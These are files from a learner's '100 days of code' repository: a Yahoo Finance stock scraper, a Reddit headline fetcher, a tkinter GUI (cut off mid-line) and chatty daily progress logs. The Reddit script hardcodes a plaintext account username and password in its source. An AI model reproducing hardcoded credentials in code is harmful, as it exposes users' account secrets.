"text": "import urllib.request\nfrom bs4 import BeautifulSoup\nimport time\nimport pandas as pd\n\nclass CheckStocks(object):\n \"\"\"A class that initiates taking companies stock market names abbreviation's and checks yahoo finance for their most recent\n information and puts the results into a pandas DataFrame\"\"\"\n def __init__(self, symb=None):\n titlelist = []\n datadict = {}\n datalist = []\n if symb is None:\n symb = [abbr.upper() for abbr in input('Enter the list of Stock Market abbreviations for the companies you would like to get information for. \\\n Separate each abbreviation with a single space. Example, \"FB TWTR NFLX AAPL\" \\n \\\n Common Companies are Facebook = FB, Google = GOOG, Apple = AAPL, Netflix = NFLX, and Twitter = TWTR ... :').split()]\n\n for sym in symb:\n sym = sym.upper()\n url = 'https://finance.yahoo.com/quote/{}?p={}'.format(sym, sym)\n headerz = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'}\n\n req = urllib.request.Request(url, headers=headerz) # setting up our request, passing the url and header\n\n resp = urllib.request.urlopen(req) # passing our request along to urlopen\n time.sleep(2) # waiting 2 seconds so that we can be sure everything loads\n\n # read the html, and pass it to BeautifulSoup for parsing, telling soup what we want\n html = resp.read()\n soup = BeautifulSoup(html, 'html.parser')\n\n tagged_values = soup.find_all(\"td\", {'class': 'Ta(end) Fw(b)'})\n tagged_titles = soup.find_all(\"td\", {'class': 'C(black)'})\n tagged_index = soup.find_all(\"h1\", {'class': 'D(ib) Fz(18px)'})\n\n datadict[sym] = pd.Series([x.get_text() for x in tagged_values], index=[t.get_text() for t in tagged_titles])\n datalist.append(datadict[sym])\n datadict['titles'] = [i.get_text() for i in tagged_index]\n titlelist.append(datadict['titles'])\n # print(datadict[sym])\n self.titles = titlelist\n self.mypf = datalist\n # make the DataFrame from all of the data we got\n # print(datadict)\n # print(datalist)\n # print(titlelist)\n # titlelist = [title for sub in titlelist for title in sub]\n # mydf = pd.DataFrame(datalist, index=[title for sub in titlelist for title in sub])\n # self.mydf = mydf\n"
},
{
"alpha_fraction": 0.5904203057289124,
"alphanum_fraction": 0.5982404947280884,
"avg_line_length": 41.625,
"blob_id": "a91d3f965ef5e736aae55de99601e602d8229f26",
"content_id": "4f83015d20760b16cd0a40ecf8ae60708a4e39e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 24,
"path": "/Projects/Gui4Scrapes/redditscr.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "import json\nimport requests\nimport unidecode\nimport time\n\n\nclass CheckReddit(object):\n def __init__(self, subreddit=None):\n if subreddit is None:\n subreddit = input('Enter the subreddit you wan\\'t to check(Exactly):')\n credentials = {'user':'websitethrowawayi',\n 'passwd': 'incognitomode',\n 'api_type':'json'}\n session = requests.Session()\n session.headers.update({'User-Agent':'#100daysofcode :D'})\n session.post('https://www.reddit.com/api/login', data=credentials)\n time.sleep(1) # JUST WAIT A SECOND WHAT'S THE RUSH!?!?!?\n\n url = 'https://reddit.com/r/{}/.json?limit=10'.format(subreddit)\n html = session.get(url)\n data = json.loads(html.content.decode('utf-8'))\n posts = [unidecode.unidecode(headlines['data']['title']) for headlines in data['data']['children']]\n self.posts = ['{}. {}'.format(num+1, post) for num, post in enumerate(posts)]\n self.final = \"\\n\".join(self.posts)\n"
},
{
"alpha_fraction": 0.7214673757553101,
"alphanum_fraction": 0.741847813129425,
"avg_line_length": 48.06666564941406,
"blob_id": "2b2ee38d8578722db829b7c11291523bba8d5fba",
"content_id": "c77986128a5858391e8c7172809ff5d9f271dc85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 736,
"license_type": "no_license",
"max_line_length": 329,
"num_lines": 15,
"path": "/Projects/Gui4Scrapes/readme.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "#Home of Gui4Scrapes\n\nSo on Day 1 of my #100DaysOfCode I made one of the scrapers, then the next day I made another scraper. I thought to myself- Ok, your not going to make scrapers every single day for 100 days.. So I decided to make a GUI for my scrapers :D. It was really fun to make this, and I hope to make some more beautiful GUIs in the future!\n\nHere is the main GUI screen(It's not the prettiest, but neither am I xD):\n\n\nHere is the stock data relayed back as pandas series:\n\n\nHere is the /r/worldnews headlines:\n\n\nLastly, here is everything in one shot:\n\n"
},
{
"alpha_fraction": 0.7203390002250671,
"alphanum_fraction": 0.7711864113807678,
"avg_line_length": 38.33333206176758,
"blob_id": "abb90062c19127d21f5cc2dc50b519d45852bec8",
"content_id": "3f773ed07729399c9c8e8592ff9cc1551a3ebc80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 3,
"path": "/Projects/readme.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "#100 Days Of Code Projects\n\nI will keep my 100 days of code projects here, along with logs that I've created locally.\n"
},
{
"alpha_fraction": 0.7190178036689758,
"alphanum_fraction": 0.7518025040626526,
"avg_line_length": 139.01904296875,
"blob_id": "d408d156554f7b97eff38214b056a13e865b001c",
"content_id": "147c34a54b0da0281f276f31173ebde4e6fc0c40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 14702,
"license_type": "no_license",
"max_line_length": 1462,
"num_lines": 105,
"path": "/log.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "# 100 Days Of Code - Log\n\n\n#Putting my 100Days on hold for now.\n\nSince I'm about to start Rmotr's Advanced Python Course, either way I'll be doing a minimum of an hour of projects and assignments for them everyday, along with helping people out and stuff. I feel I need to put everything I have into the course for a few reasons. 1- I was lucky enough to get a full scholarship for both the Intro, and Advanced class... and 2- One of the things that really helped me learn in the Intro class was completely dedicating every minute I could to the course. Whether it be assignments, projects, or helping people out I need to focus on the course for now and worry about projects later. Rmotr will keep me busy enough with projects/assignments for now :) I also have stuff for school that I'm always working on, and I really just don't have enough time to do everything, so I'm putting 100DaysOfCode on hold for now. I plan to start back up again as soon as the Advanced class ends, this way I can \"stay in shape\", Which should be sometime within the second week of February, as the last coding session is on the 8th I believe. In that case I'll take Feb 9th to figure out what I want to work on first(Day 0) and do anything I have to do before I start my 100Days again. Like I said I am also very interested in doing FreeCodeCamp projects getting back into HTML and learning CSS and JS... We'll see.. For now I'm sticking with RMOTR's Advanced Python Course- Which will be another great experience with a great group of people... \n\n**Note to self: Work on the Alexa skill(You know what I mean).**\n\n\n\n\n### Day 6: January 8th 2017\n\n**Today's Progress**: Finished up some Coursera assignments, and used HTML for the first time in 5+ years. Built a simple straight HTML web page with images and stuff, just to get the feel of HTML again- Since I plan on doing some FreeCodeCamp projects during my 100days.\n\n**Thoughts**: I really want to start using HTML CSS and JS, but I don't know if I'll overload myself trying to learn that plus everything I'm learning in Python(i.e Data Science, Flask stuff, Django stuff), plus my actual schoolwork... I think I'll be fine with basic HTML, CSS, and JS.. But getting into the more Intermediate/Advanced stuff I might be putting a little too much on my plate. I think It might be best for me to work on C and Python for now, and maybe, basic HTML, CSS and JS.. I don't know, I'll see.. Anyway, It was fun working with simple HTML since it's been so long, and I'm glad I got my Coursera assignments done on time, and I'm still sticking with #100DaysOfCode :). I need to think of a project for Day 7.. I was thinking some kind of Alex Skill ;). Hmmmmm.\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">I worked on Python assignments, and then played with HTML(Nothing crazy)- Think Last time I used it I was in HS.. It was fun! <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/818326399517913088\">January 9, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 5: January 7th 2017\n\n**Today's Progress**: Finished up the GUI! It is now fully functional :)\n\n**Thoughts**: It felt good to finish this project. I'm glad I stuck with it and actually finished it. It is now fully functional and I'm satisfied with how it turned out. I'll probably move on to a new project tomorrow because I really can't think of anything else I can add to the GUI besides another scraper... But I'd like to work on something else so well see what I can come up with.. One thing is for sure: I have to try and get done earlier because I've been getting done with everything at around 1:00AM and it's been extremely hard for me to get up in the morning. Tomorrow I need to work on some Coursera stuff and also work on my actually school work, but I'm definately going to slip in at least an hour of coding at the bare minimum. \n\n**Link(s) to work**: [Gui4Scrapes](https://github.com/JayBk/100-days-of-code/tree/master/Projects/Gui4Scrapes)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 5 <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! The GUI for the scrapers is done and fully functional! :) Starting a new project tmr<a href=\"https://t.co/B0kEFeajMw\">https://t.co/B0kEFeajMw</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817978443816177664\">January 8, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 4: January 6th 2017\n\n**Today's Progress**: I would like to think that I got a lot done today.. :D I added functionality to my GUI... The reddit part is basically fully complete, you type the subreddit, click the button, and get a new window with about 10 of the hottest headlines for that subreddit. Also, the stocks part is technically functional but not complete. You can type the abbreviations, click the button, and get a new window with a DataFrame, but the entry is not taking the input correctly because I forgot to set it up; and the DataFrame is displaying all yucky.\n\n**Thoughts**: I feel like I got a lot done, and when I first got the reddit part to work completely I felt really happy that I accomplished that and wanted to keep moving foward and make it look nicer. I made it look as nice as I can using basic fonts and stuff for now.. I ran into a few problems here and there, but nothing that was too crazy to figure out.. I had a fun day and I'm really glad I'm doing this and I hope that I'll stick with it for the full 100 days because I know that I will grow so much. For now, I'm tired as shit. \n\n**Link(s) to work**: [Gist: Incomplete But Functional GUI](https://gist.github.com/JayBk/d1a1836f3427a078ce431be59e312520) \n\n[Imgur: What the main GUI looks like](http://imgur.com/a/GWlOU). \n\nThe rest of these are after you enter text and click the appropriate button: \n\n[Imgur: How the DataFrame(scrapingstocks) looks displaying it with Text](http://imgur.com/Wvw4zbb)\n\n[Imgur: How the DataFrame(scrapingstocks) looks displaying it with Message](http://imgur.com/vqUufAe)\n\n[Imgur: What the Headlines from the Subreddit of your choice look like](http://imgur.com/a/QRsLQ)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 4 of my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! Coming along well with the GUI, It has some pretty good functionality now! <a href=\"https://t.co/06jlppqm1t\">https://t.co/06jlppqm1t</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817616092105506816\">January 7, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 3: January 5th 2017\n\n**Today's Progress**: Made the basic layout for my GUI using tkinter instead of PyQt... I organized the GUI and now I'm working on the functionality of the buttons and the Entry's.. I was also working on how I was going to display the data back to the 'user' and found I can use a messagebox, so I was also toying with that... Fun day!\n\n**Thoughts**: I was going to use PyQt at first, but ran into a whole bunch of trouble. I sat down to code at like 9 o'clock again... Messing around trying to get PyQt going took me an hour, maybe even longer. I was sooo pissed off because I've using PyQt before, and I probably would've gotten more done today... But anyway I decided to go with tkinter, which isn't to hard to use.. I got some help from tutorialspoint-- which isn't what it sounds like... They just show you the commands and the syntax for certain things and explain them.. But anyway, getting the positioning to look somewhat good was kind of a challenge, but I ended up with something that didn't look too bad(I think). I started to work on making the reddit scrape button run a function that takes the input from the entry box and calls my redditscaper, then returns the data and shows it in a message box.. I have some errors, but It's a work in progress- so I'll work more on it tomorrow :). For now, I'm super tired since it's 2:26 AM; but I'm glad I stuck with my commitment AGAIN, and made it to Day 3... It's making me feel good and I don't even look at the time; it just flies by and then I notice it's 2:30AM and I'm like FUUUUU NOT AGAIN! Lol... Anyway; I had a lot of fun, and I already feel like this is really helping me improve! I can't imagine how I'd feel after like 50! Looking foward to work more on this tomorrow.\n\n**Link(s) to work**: [The GUI, The Reddit Button Function(so far), and A Kinda Updated redditscr.py](https://gist.github.com/JayBk/d323b9cfc27dfcf459811be4ec711c56)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 3 of my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> ! Working on a GUI for my two "scrapers".. Had a lot of fun today! <a href=\"https://t.co/EZSxybbJJi\">https://t.co/EZSxybbJJi</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/817272316526809088\">January 6, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 2: January 4th 2017\n\n**Today's Progress**: Not much today. Just a program that gets the top 10 new posts from any subreddit using reddits api and relays it back to you.\n\n**Thoughts**: I first wanted to do something using selenium; I wanted to get the last game score for any hockey team that the user wanted.. It wasn't going well at all, so about a half hour in, I scratched it and then decided to do what I did. I plan on making one or two more scraper like programs(note to self: twitter), and put it all into a GUI with buttons for each of them using PyQT. I was going to stop after I scratched the selenium program, but forced myself to think and keep coding. I'm glad I did, and I'm glad I've at least gotten to Day 2! :D\n\n**Link(s) to work**: [Get Any Subreddit's 10 Newest Posts](https://gist.github.com/JayBk/02163ac2b69fd80c9a5b615c4fa884d0)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 2 of <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> after 12am again xD Not much today, but I have more planned in the coming days :) <a href=\"https://t.co/emSuuLvoca\">https://t.co/emSuuLvoca</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816907688626049024\">January 5, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 1: January 3rd 2017\n\n**Today's Progress**: Created a scraper that lets takes the input of a user, but it has to be the stock market abbreviation/name of a company, and scrapes yahoo's financial page for that company, and returns the results in a pandas DataFrame. :). I was going to make it so that it would ask you if you wanted to scrape again but I ran into a lot of trouble doing that for some reason, and it took me way too long to work on that when I wasn't even finished with getting the data into a DataFrame, so I dropped that, and decided to finish the basic functionality of the code. I'm planning to add on to the code as I go along and add more functionality to it. Wish me luck!\n\n**Thoughts**: I have a seperate log that I put in 100-days-of-code/Projects/Day(X) that I write to locally as I run into problems and things. But I will also write my thoughts to this log... I ran into a lot of problems with what I wanted to do today, and kept thinking that I was done, but then ran into another issue. I spent way more than an hour on what I did, and I'm happy I stuck with it and finished the first day :D. They say the hardest part of doing things is taking that first step and getting starting/ commiting to something. I hope that I'll be able to stick with this! Also, it's 12:41am 1/4/2017 right now but as the rules stated, it still counts for the other day because I haven't gone to sleep yet, and I was actually doing the majority of my coding before 12am(it took me a while to finish this project :X). Anyway I can't wait to have some more fun tomorrow! :D\n\n**Link(s) to work**: [Scraper To DataFrame](https://gist.github.com/JayBk/ca177a944edc3a89704d04aa031795c3)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Finished Day 1 of <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> :D Glad I stuck with my commitment for atleast one day! Not much but I worked hard!<a href=\"https://t.co/DSXZXwZoqz\">https://t.co/DSXZXwZoqz</a> <a href=\"https://t.co/IbAuuhqfKa\">pic.twitter.com/IbAuuhqfKa</a></p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816522316070973440\">January 4, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n\n\n### Day 0: January 2nd 2017\n##### (KINDA-When I started writing this it was)\n\n**Today's Progress**: Decided to commit to #100daysofcode, and I'm going to Use Python. Although I might decide to do some freecodecamp projects here and there as I've been wanting to learn Web Development.\n\n**Thoughts:** Well right now it is technically 1/3/2017, 12:05AM at night and I haven't slept yet so It's still technically Day 0. I plan to do my coding tomorrow around 2-6pm. I have an idea of what I want to start working on. Since I've been learning Data Science and how to use things like Selenium, and Beautifulsoup; I want to build a project that checks stock market info for tech companies like facebook, google, etc and puts it into a DataFrame(since I'm getting into pandas at the moment). I just got the idea that I could also make it into an alexa app and have alexa get me the stock market values for a certain company I ask for... We'll see :D. \n\n####NOTE TO SELF: During these 100 days would be a good time to work on the what should I wear and other skillets xD\n\n**Link to work:** [Me publicly commiting to #100daysofcode](https://twitter.com/Shablam6/status/816144867432734720)\n\n<blockquote class=\"twitter-tweet\" data-lang=\"en\"><p lang=\"en\" dir=\"ltr\">Starting my <a href=\"https://twitter.com/hashtag/100DaysOfCode?src=hash\">#100DaysOfCode</a> tomorrow 1/3/2017! I will be using Python for the 100 days, but I might also add in some <a href=\"https://twitter.com/FreeCodeCamp\">@FreeCodeCamp</a> projects!</p>— Jay (@Shablam6) <a href=\"https://twitter.com/Shablam6/status/816144867432734720\">January 3, 2017</a></blockquote>\n<script async src=\"//platform.twitter.com/widgets.js\" charset=\"utf-8\"></script>\n"
},
{
"alpha_fraction": 0.7103235721588135,
"alphanum_fraction": 0.7222833633422852,
"avg_line_length": 87.5,
"blob_id": "3cdad81691d445cdc077177b884d992451b8e063",
"content_id": "fa83d41f2fa8d3a9cd3f24c5d1b5ec3a192f8454",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13629,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 154,
"path": "/Projects/log.md",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "## My personal log that I started writing to locally\n\n##Day 1\n\nDay 1:\n\n```\n again = True\n while again:\n choice = input('Would you like to search again? (y/n): ')\n if choice is 'y':\n check_stocks()\n break\n if choice is 'n':\n search = False\n break\n elif choice is not 'y' or choice is not 'n':\n print('Please Enter \"y\", or \"n\".')\n```\n\nBeen trying this shit forever... I'm done with that for now... I'll incorperate another search again option tomorrow or another day.\nI was also trying to use try and except and using an Exception I created but still couldnt get it to work :/...\n \n**NOTE:** Also, why don't you have the results saved to a file or something like that?\n \nAdding .lower() after the input stuff fucks it up for some reason.. even doing choice = choice.lower() afterwards fucks everything up...\n\nI spent a shitload of time on mydater= pd.Series([x.get_text() for x in tagged_values], index=[t.get_text() for t in tagged_titles])\n \nI kept getting results like:\n ```\n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"352\"><span data-reactid=\"353\">Previous Close</span></td>> 115.05\n \n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"356\"><span data-reactid=\"357\">Open</span></td>> 116.03\n \n <bound method Tag.get_text of <td class=\"C(black)\" data-reactid=\"360\"><span data-reactid=\"361\">Bid</span></td>> 116.65 x 200\n ```\n\nInstead of:\n\n```\nPrevious Close 115.05\n\nOpen 116.03\n\nBid 116.65 x 200\n```\n\nAll because I was using: t.get_text instead of t.get_text() ...\n\nI was also having some trouble getting the text(`get_text()`) for the index's(`tagged_index`) because at first I was trying to append\ntagged_index to titlelist, and then when I was making the DataFrame, tried saying `index=[title.get_text() for title in titlelist]` but\nthat didn't work, so then I tried appending and using get.text at the same time like: `titlelist.append(tagged_index.get_text)` but that\ndidn't work... I kept on getting: `AttributeError: 'ResultSet' object has no attribute 'get_text'`. So I then tried something like \nappending tagged_index to titlelist and then right before making the DataFrame; doing `titlelist = [title.get_text() for title in \ntitlelist]`... But that didn't work lol. I thought for a while and then finally settled on putting it into my datadict like I am with \nthe data itself, and while I add it to the datadict I'm using list comprehension to get_text(), `datadict['titles'] = [i.get_text() \nfor i in tagged_index]` and then I', appending it to my titlelist so I doing it a few different ways but then just settled on putting it\ninto my datadict, using list comprehension, then appending it to my titlelist after that.\n\nNEVERMIND. Still having problems with the index's I want to use for my DataFrame... My titlelist is returning something like this: \n`[['Alphabet Inc. (GOOG)'], ['Facebook, Inc. (FB)']]`, and when I try and create my DataFrame like this:\n`df = pd.DataFrame(datalist, index=titlelist)` I get: `ValueError: Shape of passed values is (16, 3), indices imply (16, 1`).. Which\nI am assuming is from how my titlelist is, I need to fix it.. Asked a friend about this, and he said I should look up list flattening.\nDid some research and found this: `[item for sublist in l for item in sublist]` on stack overflow, going to incorperate that now, and If\ni can get the titles to work... IM DONE(for today). Ahh ok, think I got it :D (Thanks Yatri for explaining it to me) I'm going to\nflatten my titlelist right before I make my DataFrame. Wait... Why can't I do that while I'm making the DataFrame? Who said I\ncan't? Well, let me go see if i can!... It does work :D ... So I finally ended up with\n`mydf = pd.DataFrame(datalist, index=[title for sub in titlelist for title in sub])` ... Good :).\n\nWell, that wraps up Day 1 of #100 days of code at 11:55pm on 1/3/2017... This took me much longer than I expected because of the \nproblems I was having incorperating a custom exception for searching again or not, and I was using try: and except: wrong and \n`myinput.lower()` was messing up my `if choice is 'y' ` for some reason, then I forgot parenthesis on `get_text()` and that took me \nabout 30 minutes to figure out lol. Then I was having trouble using `get_text()` for the titlelist and had to figure out how I could do\nthat... and THEN I was having trouble using titlelist, then figured out that it looked like \n`[['Alphabet Inc. (GOOG)'], ['Facebook, Inc. (FB)']]` and then Yatri told me to check out flattening and that was a HUGE help. Now it's\n12:01am hahaa I still have to put this on GitHub. I'd like to also incorperate this into a Jupyter Notebook and put it on GitHub because\nit looks pretty cool.. Now just to figure out how :D.\n\nGoodnight!\n\n\n\n##Day 2:\n\nDAY 2:\nIt's 1:35am in the morning and I have to be up early and I've been having trouble sleeping as it is. I've been coding since about 11:30ish- I was going to use selenium to get hockey scores for whatever team you want\nbut that didn't work out, and by then it was 12, and I was about to say fuck it, but then remembered that I watched a video by sentdex on his reddit worldnews alexa skills app using flask-ask and some other stuff. I\ndid some more research into the reddit api, and came up with the code I have. It let's you enter the exact subreddit you want the first 10 values for and prints it out. My new endgame here is to incorporate what I made\nyesterday, and what I made today, and maybe some more stuff, into a nice object oriented GUI with buttons for each \"scrape\" using PyQT. Today wasn't really a good day, I just wasn't really feeling it, and I wasn't going\nto do the challenge today but I'm glad I stuck with it. Oh, I also made my stock market scraper a little more object oriented so that when I make the PyQT app, it's ready-ish(I'm sure I'll have to make a shitload of \nchanges anyway lol)\n\n##Day 3:\n\nDAY 3:\nOk, maybe i'll get done before 12am today? Doubtful... But I really can't stay up late, I need to try and go to sleep earlier because I've been barely getting any sleep and it's really effecting\nme.. I'm exhausted throughout the day and have been waking up late- which is bad because I have a lot of stuff to do throughout the day even though I'm unemployed at the moment(I have class at night(6-8ish)\nWell, here goes nothing- I'll get started using PyQt, and see what I can get done today :). I also need to work on my Coursera work which I've been slacking on and I don't want to fall behind so I might not go\ntoo much passed an hour today..\nOK, i decided to use tkinter, but I have to write some stuff down real quick:\nSo for both buttons I need to have it so that If you click on it, they'll pop up a new message screen with the message..\nOK- It's 2:05AM... I'm done... I'm having a lot of errors, but I'll work on it more when I wake up. Right now I just created the function for the reddit scraping button, and I'm running into trouble importing things,\nI think I'm just too tired to notice shit right now lol. I built the basic GUI, added buttons ,labels and entries.. So now I'm just really trying to work on the functionality of the buttons.\n________________________________________________________________________________________________________________________\nErrors that I was running into before I stopped. vvvvvv\n```\nC:\\Users\\jkopp\\Python\\Python35-32\\python.exe C:/Users/jkopp/PycharmProjects/Day1Selenium/gui4scrapes.py\nTraceback (most recent call last):\n File \"C:/Users/jkopp/PycharmProjects/Day1Selenium/gui4scrapes.py\", line 3, in <module>\n from scrapeget import *\n File \"C:\\Users\\jkopp\\PycharmProjects\\Day1Selenium\\scrapeget.py\", line 4, in <module>\n from gui4scrapes import *\n File \"C:\\Users\\jkopp\\PycharmProjects\\Day1Selenium\\gui4scrapes.py\", line 19, in <module>\n redditButton.bind(\"<Button-1\", scrapeReddit())\nAttributeError: 'NoneType' object has no attribute 'bind'\n\nProcess finished with exit code 1\n```\n________________________________________________________________________________________________________________________\n\n##DAY 4:\n\nDay 4:\nOkay, 12:06AM, I've been working on my GUI for hours..I am proud to say the reddit scrape button functionality is FULLY FUNCTIONAL!!!!!! The popup window it makes is pretty nice.. As nice as I can get with some\nsimple font parameters lol.. Anyway, I was so happy when I got that working fully... :D So I moved onto the stock scraping one, which is a little different because I want to display a DataFrame, and theres a\nlot more data than just 10 sentences of headlines like the reddit scrape one.. Also, a DataFrame can get really messy looking and confusing if it isn't displayed right, and I don't want mine to look\nall yucky.. First I tried displaying it the same way as I was displaying the reddit stuff just to see what would happen, and the first things I tried were \"FB GOOG AAPL\", which should've given me back\nFacebook, Google, and Apple's stock market info. For some reason I got a 404... Since I've made and tested the stock scraper I've NEVER gotten a 404 so I was like wtf? For some reason I thought that the way\nI was displaying it was fucking everything up somehow, so I did some research and then decided to try displaying it as Text(window) instead of Message(window)- like how I was displaying the reddit stuff. So\nI went and changed it to use Text, and then spun it up again.. For some reason this time I only typed in 'FB', and of course; it worked.. But something was wrong: Instead of displaying Facebook it was displaying\nFord Motor Company (F), and Barnes Group Inc. (B), for some reason.. [How it Looks Using Text(window)](http://imgur.com/Wvw4zbb) ... And [How it Looks Using Message(window)](http://imgur.com/vqUufAe) This means\nthat it is interpreting every letter It get's as a different \"entry\", so I need to see why and fix that, because the abbreviations are supposed to be separated by spaces, but wait... oh shit..\n I only ever set that up for input() in scraping.py... I never set it up for the Entry() for the gui.. ooohhhh okay. I see now- I'll work on that tomorrow. OK, I'm glad I noticed that now :).\n Ok, so tomorrow I need to work on not only the formatting of how to display the DataFrame but I need to also work on how to get the Entry() to work the right way either like I had it before, or maybe\n they could even be separated by commas... Alright, I'll work on it tomorrow, hopefully I'll get everything uploaded to gist/github and be done by 1:00AM.. It's 12:46 right now.. Day 4 Complete!\n \n##DAY 5:\n \nDay 5: **Holy Shit Day 5!?**\n12:09AM D: lol after 12 again! W.e I accept the fact I'll be done after 12 every day... So today I needed to fix the Entry() and how I was displaying the dataframe, I'll start with the Entry.. I did some\nresearch but I didn't find anything that related to what I had in mind, so I just started messing around with things.. I tried list comprehension, but all that did was throw errors at me and after some rigging\nI got a list in a list which I didn't want because I already had to get rid of a list within a list on Day 1 I think when I made this, so no sense bringing it back into a list of a list lol.. I ended up looking\nat scraping.py(the file that scrapes the data)(which i should've done in the first place) and realized that I used .split(\" \") for the input there, and that it would probably work if I implemented it for\n the Entry... Sure as shit it did! Now onto displaying the data.. I tried so many different ways and spent at least an hour and a half researching and implementing random things, trying to install a package\n called pandastable, which kept failing to install because of one of it's dependencies; so then I tried to install the dependency first but that was failing to install. I said fuck it and decided to keep\n trying random things. After a little bit of random implementations again I was at a loss for trying to display the dataframe in a nice way... I decided to try using a pandas series, and a single one came\n out pretty good, so I tried two. When I tried two there was one on top and one on the bottom, and the form was a little messed up, but nothing that I couldn't fix because they were two separate series.\n I tried stuff like adding a newline(\"\\n\") and two tabs(\"\\t\\t\") between the two since I was returning a list of series, and figured I'd just but newlines or tabs to space them apart.. Nice try but no. It\n didn't work out as planned. Again, I was at a loss for how I could properly display my data. Then I thought, well what If I could display each series separately, in it's own Message()? To make that work nicely\n I would somehow have to have them all in different columns depending on how many companies a person scrapes... I thought about it for a while and played with some nested for loops, and trying to use all kinds \n of different combinations of using \"and\" between stuff.. Then I finally realized that I could just use two separate for loops using enumerate() so I could have the numbers for the columns and the data for the\n Message(the series), and the Label(the titles). The numbers for the columns needed to match up for the Labels and the Message, so the Labels are always in row 0, column X, and the Messages are always in \n row 1, column X.. It ended up working and looking beautiful(in my opinion). So that was my day 4 100daysofcode.. I think I may be done with this project now :O I will probably start something new tomorrow!\n"
},
{
"alpha_fraction": 0.6751233339309692,
"alphanum_fraction": 0.6945031881332397,
"avg_line_length": 34.474998474121094,
"blob_id": "d72cedaddedb94d6ecfad462a94b605f2a791685",
"content_id": "aa1c3d85815dcaaca80bfd63ea58d45669cbbc28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2838,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 80,
"path": "/Projects/Gui4Scrapes/gui4scrapes.py",
"repo_name": "JayBk/100-days-of-code",
"src_encoding": "UTF-8",
"text": "from tkinter import *\nfrom tkinter import ttk\nfrom redditscr import *\nfrom scraping import *\n\n\ndef scrapereddit():\n top = Toplevel()\n top.title('Your Headlines!')\n\n subreddit = redditEntry.get()\n titles = CheckReddit(subreddit)\n redditEntry.delete(0, \"end\")\n showFont = (\"Verdana\", 16)\n Label(top, text='Top headlines in /r/{}!'.format(subreddit), font=(\"Comic Sans MS'\", 24, \"underline\")).pack()\n showPosts = Message(top, text=titles.final, font=showFont)\n showPosts.pack(pady=50)\n # Button(top, text=\"Quit\", command=top.destroy()).pack(side=BOTTOM, fill=X)\n top.focus_force()\n top.mainloop()\n return top\n\n\ndef scrapestocks():\n top2 = Toplevel()\n top2.title('Stock Market Data!')\n # print(stockEntry.get())\n abbrevs = stockEntry.get().split(\" \")\n # print(abbrevs)\n stockData = CheckStocks(abbrevs)\n stockEntry.delete(0, \"end\")\n dFont = (\"Verdana\", 12)\n # myl = Label(top2, text='Stock Market Data For {}!'.format(abbrevs), font=(\"Verdana\", 22, \"underline\"))\n # myl.pack()\n stockPf = stockData.mypf\n stockTi = stockData.titles\n # showStocks = Text(top2)\n # showStocks.pack()\n # showStocks.insert('end', stockDf)\n # showStocks = Message(top2, text=stockDf, font=dFont)\n # showStocks.pack()\n\n for j, title in enumerate(stockTi):\n Label(top2, text='Data for {}.'.format(title), font=(\"Verdana\", 16, \"underline\")).grid(row=0, column=j, 